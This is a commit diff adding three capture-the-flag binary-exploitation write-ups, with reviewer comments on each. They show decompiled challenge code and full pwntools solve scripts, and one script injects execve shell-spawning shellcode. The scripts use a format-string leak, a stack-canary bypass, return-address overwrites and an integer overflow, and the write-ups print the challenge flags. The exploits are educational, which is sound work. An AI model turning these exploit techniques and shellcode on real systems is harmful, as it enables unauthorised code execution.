Commit 1925cb3 (1 parent: 5ce89dd)
Showing 18 changed files with 595 additions and 2 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,148 @@ | ||
+++ | ||
title = "Paranoid Part 2" | ||
date = 2024-07-02 | ||
authors = ["Abhinav I S"] | ||
+++ | ||
|
||
first, we will run checksec on the binary | ||
|
||
```bash | ||
checksec --file=challenge | ||
``` | ||
<br> | ||
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }} | ||
|
||
Opening the binary in a decompiler (Ghidra) and looking at main function gives | ||
|
||
```c | ||
|
||
void main(void) | ||
|
||
{ | ||
undefined local_68 [48]; | ||
char local_38 [48]; | ||
|
||
banner(); | ||
puts( | ||
"\nHey its Anonymous again...Someone leaked my temporary location to the FBI and they sent an agent to the location I provided them" | ||
); | ||
puts("\nIt\'s no longer safe to provide you the address of our temporary meeting point."); | ||
puts("\nI\'m gonna have to hide and lay low for a while..."); | ||
puts("\nTry reaching out to me after things have settled down"); | ||
printf("\nGive me a name so that I can identify you if and when you contact me: "); | ||
fflush(stdout); | ||
read(0,local_38,0x23); | ||
printf("\nAlright Mr. "); | ||
printf(local_38); | ||
printf( | ||
"\nI\'ll look forward to doing business with you...Till then, is there anything that you wou ld like to convey? " | ||
); | ||
fflush(stdout); | ||
read(0,local_68,0x110); | ||
return; | ||
} | ||
``` | ||
Analyzing other functions, | ||
there seems to be a suspicious function safe_house | ||
```c | ||
void safe_house(void) | ||
{ | ||
char local_98 [136]; | ||
FILE *local_10; | ||
local_10 = fopen("flag.txt","r"); | ||
if (local_10 == (FILE *)0x0) { | ||
puts( | ||
"\nThere is no \'flag.txt\' present in this directory. Please create sample flag for local e xploitation." | ||
); | ||
/* WARNING: Subroutine does not return */ | ||
exit(0); | ||
} | ||
fgets(local_98,0x80,local_10); | ||
printf(local_98); | ||
putchar(10); | ||
fflush(stdout); | ||
/* WARNING: Subroutine does not return */ | ||
exit(0); | ||
} | ||
``` | ||
|
||
clearly, we have to return to this function | ||
|
||
there is a printf and two read function calls. | ||
We can exploit a format string vulnereability to leak addresses from the stack, and calculate address of safe_house, since PIE is enabled | ||
|
||
first step is to figure out the offset for the printf format string to print out addresses in the code section | ||
|
||
starting the binary in gdb, and disassembling main, we find that addresses likely in the text section start with 0x5555555 | ||
|
||
<br> | ||
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }} | ||
|
||
setting a break point at the first printf, and printing the stack | ||
|
||
<br> | ||
{{ img(id="image3.png", alt="Alt Text", class="textCenter") }} | ||
|
||
we can see that %21$lx prints out the address of main | ||
|
||
Next, we need to calculate the address of safe_house | ||
from ghidra, we can see that the address of safe_house is 0x010125a, | ||
and address of main is 0x0101316 | ||
|
||
So, address of win is main - 188 | ||
|
||
We can create our solve script, overflowing the buffer, RBP, into the return address | ||
|
||
```python | ||
#!/usr/bin/env python3 | ||
|
||
from pwn import * | ||
|
||
exe = ELF("./challenge") | ||
|
||
context.binary = exe | ||
# context.log_level = "debug" | ||
|
||
def conn(): | ||
if args.LOCAL: | ||
r = process([exe.path]) | ||
if args.DEBUG: | ||
gdb.attach(r) | ||
else: | ||
r = remote("rvcechalls.xyz", 27250) | ||
|
||
return r | ||
|
||
|
||
def main(): | ||
r = conn() | ||
r.recv() | ||
r.sendline(b"%21$lx") | ||
data = r.recv() | ||
lines = data.split(b"\n") | ||
main = lines[1].split(b".")[1].lstrip(b" ") | ||
print(main) | ||
win = int(main,16) - 188 | ||
print(hex(win)) | ||
payload = b"A"*0x68 + p64(win+1) | ||
r.sendline(payload) | ||
print(r.recv()) | ||
r.interactive() | ||
|
||
|
||
|
||
|
||
if __name__ == "__main__": | ||
main() | ||
``` | ||
|
||
giving the flag | ||
|
||
``` | ||
flag{Mr_S0-c4ll3d_4n0nym0u5_ha5_l04d5ss_0F_53cUr1Ty_155u35_1907e55351f} | ||
``` | ||
|
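Review bot: the payload in the solve script returns to `win+1` while the text above states `address of win is main - 188`, and nothing in the writeup explains the extra byte; state why the function's first byte is skipped (or drop the `+1` if the script is known to work without it) so the derivation and the script agree. Two smaller points: the prose calls the target `win` once and `safe_house` everywhere else, so pick one name; and `main = lines[1].split(b".")[1].lstrip(b" ")` shadows the `main()` function and relies on a bare `r.recv()` returning the whole banner in one read, so rename it (e.g. `leaked_main`) and read up to a delimiter with `r.recvuntil(b"Mr. ")` the way the part 3 script does with `recvuntil(b"better than ")`. Also fix the typo `vulnereability`, and the `wou ld` / `e xploitation` splits inside the quoted strings look like line-wrap artifacts from the decompiler export rather than the binary's real text.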
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,111 @@ | ||
+++ | ||
title = "Paranoid Part 3" | ||
date = 2024-07-04 | ||
authors = ["Abhinav I S"] | ||
+++ | ||
|
||
First, we run checksec | ||
<br> | ||
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }} | ||
|
||
<br> | ||
|
||
```c | ||
void main(void) | ||
|
||
{ | ||
long in_FS_OFFSET; | ||
char local_68 [48]; | ||
undefined local_38 [40]; | ||
long local_10; | ||
|
||
local_10 = *(long *)(in_FS_OFFSET + 0x28); | ||
banner(); | ||
puts("\nOkay Its getting serious now. Somehow I now suck at hiding my actual address."); | ||
puts("\nHence, I\'ve now decided to keep one of the strongest security guard on watch"); | ||
puts("\nHe will make sure that no one gets in and collects any evidence against me"); | ||
puts("\nHe\'s no ordinary guard I tell ya...The FBI fear him!"); | ||
printf("\nCan you guess who he is?: "); | ||
fflush(stdout); | ||
read(0,local_68,0x23); | ||
printf("\nReally? you couldn\'t think of anyone better than "); | ||
printf(local_68); | ||
printf( | ||
"\nTill we meet again then my old friend...Give me your final message. You will likely not s ee me now for a long time: " | ||
); | ||
fflush(stdout); | ||
read(0,local_38,0x120); | ||
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { | ||
/* WARNING: Subroutine does not return */ | ||
__stack_chk_fail(); | ||
} | ||
return; | ||
} | ||
``` | ||
looking at the other functions, there is a safe_house function which we need to return to. The difference from paranoid part 2 is the existence of [a stack canary](https://ctf101.org/binary-exploitation/stack-canaries/) | ||
opening the binary in GDB, examining addresses of RBP, and the value that gets printed from the stack, we can calculate the offset to the canary, and the address of main | ||
1. give input %7$lx, the value that gets printed out is 0 | ||
2. examine stack and value of rbp | ||
<br> | ||
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }} | ||
3. clearly the canary is at %17$lx and the address of main is at %21$lx | ||
Now, we can write the solve script | ||
```python | ||
#!/usr/bin/env python3 | ||
from pwn import * | ||
exe = ELF("./challenge") | ||
context.binary = exe | ||
context.log_level = "debug" | ||
def conn(): | ||
if args.LOCAL: | ||
r = process([exe.path]) | ||
if args.DEBUG: | ||
gdb.attach(r) | ||
else: | ||
r = remote("rvcechalls.xyz", 33545) | ||
return r | ||
def main(): | ||
r = conn() | ||
r.recv() | ||
r.sendline(b"%17$lx.%21$lx") | ||
data = r.recvuntil(b"better than ") | ||
data = r.recv() | ||
addresses = data.split(b"\n")[0] | ||
canary = addresses.split(b".")[0] | ||
main = addresses.split(b".")[1] | ||
# r.recv() | ||
win = int(main,16) - 211 | ||
payload = b"A"*0x28 + p64(int(canary,16 ))+ b"B"*8 + p64(win) | ||
r.sendline(payload) | ||
r.recv() | ||
# good luck pwning :) | ||
r.interactive() | ||
if __name__ == "__main__": | ||
main() | ||
``` | ||
|
||
gives us the flag | ||
<br> | ||
|
||
``` | ||
flag{Th15_pUnY_6u4rd_aint_S70pp1n_m33_1907ebe25bf} | ||
``` |
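Review bot: `win = int(main,16) - 211` is the only place the safe_house offset appears; unlike part 2, this writeup never gives the Ghidra addresses of `main` and `safe_house`, so the reader cannot check the 211. Add the two addresses and the subtraction next to the numbered steps, and say what step 1 (`%7$lx` printing 0) told you, since the text jumps from it straight to `clearly the canary is at %17$lx` without the intermediate reasoning. In the script, `data = r.recvuntil(b"better than ")` is immediately overwritten by `data = r.recv()`, so the first assignment is dead (a bare `r.recvuntil(...)` call would do), and `context.log_level = "debug"` is left enabled while the other two scripts comment it out. The canary parse also depends on both leaked values landing before the first `\n`, which holds here only because the format string prints them on one line; a comment saying so would save the next reader a debugging round.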
content/writeups/RVCExIITBFinals/physicistquest/index.md (121 changes: 121 additions & 0 deletions)
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,121 @@ | ||
+++ | ||
title = "The Physicist's Quest" | ||
date = 2024-07-04 | ||
authors = ["Abhinav I S"] | ||
+++ | ||
|
||
First, we run checksec on the binary | ||
|
||
```bash | ||
checksec --file=challenge | ||
``` | ||
|
||
<br> | ||
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }} | ||
|
||
NX disabled indicates we can execute from stack, hence this is likely a shellcode injection challenge. | ||
|
||
Now, opening in a decompiler (Ghidra): | ||
|
||
```c | ||
|
||
undefined8 main(void) | ||
|
||
{ | ||
int local_70; | ||
int local_6c; | ||
undefined local_68 [92]; | ||
uint local_c; | ||
|
||
fflush(stdout); | ||
puts("Hi you know my buddy"); | ||
puts("He\'s stuck with his research on string theory"); | ||
puts( | ||
"He\'s too proud to admit it, but he needs your help. But first you will need to prove that yo u are worthy enough for this" | ||
); | ||
puts("enter two magic numbers"); | ||
__isoc99_scanf(&DAT_001020e1,&local_6c); | ||
__isoc99_scanf(&DAT_001020e1,&local_70); | ||
if ((-1 < local_6c) && (-1 < local_70)) { | ||
local_c = local_70 + local_6c; | ||
printf("Your magic value is %d\n",(ulong)local_c); | ||
if ((int)local_c < 0) { | ||
puts( | ||
"Good job! Now you need to figure out my location so that I can trick my friend into meeti ng you" | ||
); | ||
printf("Meet us in secrecy at %p\n",local_68); | ||
read(0,local_68,200); | ||
} | ||
return 0; | ||
} | ||
printf("BAZINGA! Close but not close"); | ||
/* WARNING: Subroutine does not return */ | ||
exit(0); | ||
} | ||
``` | ||
ok , if local_6c and local_70 are positive and their sum is negative, we can write into a buffer, and the address of this buffer is printed out. | ||
The first if conditions can be achieved by [Integer Overflow](https://en.wikipedia.org/wiki/Integer_overflow). | ||
Now, we put shellcode in the buffer and overwrite the return address with the address of the buffer (the shellcode). | ||
We can create our solve script: | ||
```python | ||
#!/usr/bin/env python3 | ||
from pwn import * | ||
exe = ELF("./challenge") | ||
context.binary = exe | ||
# context.log_level = "debug" | ||
def conn(): | ||
if args.LOCAL: | ||
r = process([exe.path]) | ||
if args.DEBUG: | ||
gdb.attach(r) | ||
else: | ||
r = remote("rvcechalls.xyz", 29639) | ||
return r | ||
def main(): | ||
shellcode = b"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05" | ||
r = conn() | ||
r.recv() | ||
r.sendline(b"2147483645") | ||
r.sendline(b"10") | ||
data = r.recv() | ||
print(data.split(b" ")[-1]) | ||
win = int(data.split(b" ")[-1], 16) | ||
print(hex(win)) | ||
payload = shellcode + b"A"*(0x68-48) + p64(win) | ||
# good luck pwning :) | ||
r.sendline(payload) | ||
r.interactive() | ||
if __name__ == "__main__": | ||
main() | ||
``` | ||
|
||
note that we need an additional 0x68-48 bytes to reach the return address since the shellcode is 48 bytes long. | ||
Shellcode was obtained from a [Shellcode Database](https://shell-storm.org/shellcode/index.html) | ||
|
||
Running the script spawns a shell, and we can print out the flag | ||
|
||
<br> | ||
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }} | ||
<br> | ||
|
||
``` | ||
flag{Gre4t_Y0u_h3lp4d_h1m_TBBT} | ||
``` |
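Review bot: the `shellcode` byte string is pasted with no statement of what it does or which shell-storm entry it is, so a reader has to disassemble it to trust the script; cite the specific entry, summarize the syscalls it makes, and put the database link next to the byte string rather than two paragraphs later. The sentence `note that we need an additional 0x68-48 bytes to reach the return address since the shellcode is 48 bytes long` is correct (the string is 48 bytes) but reads more clearly as: the distance from `local_68` to the return address is `0x68` bytes, of which the shellcode fills the first 48. The integer-overflow paragraph should also name the actual inputs used by the script: `2147483645 + 10` exceeds `INT_MAX` (2147483647), so both inputs pass the `-1 <` checks while the `(int)local_c` cast goes negative. Minor: `ok ,` should be `Ok,`, and since the checksec result exists only as an image, list the remaining flags in text alongside the `NX disabled` observation so the writeup survives a missing image.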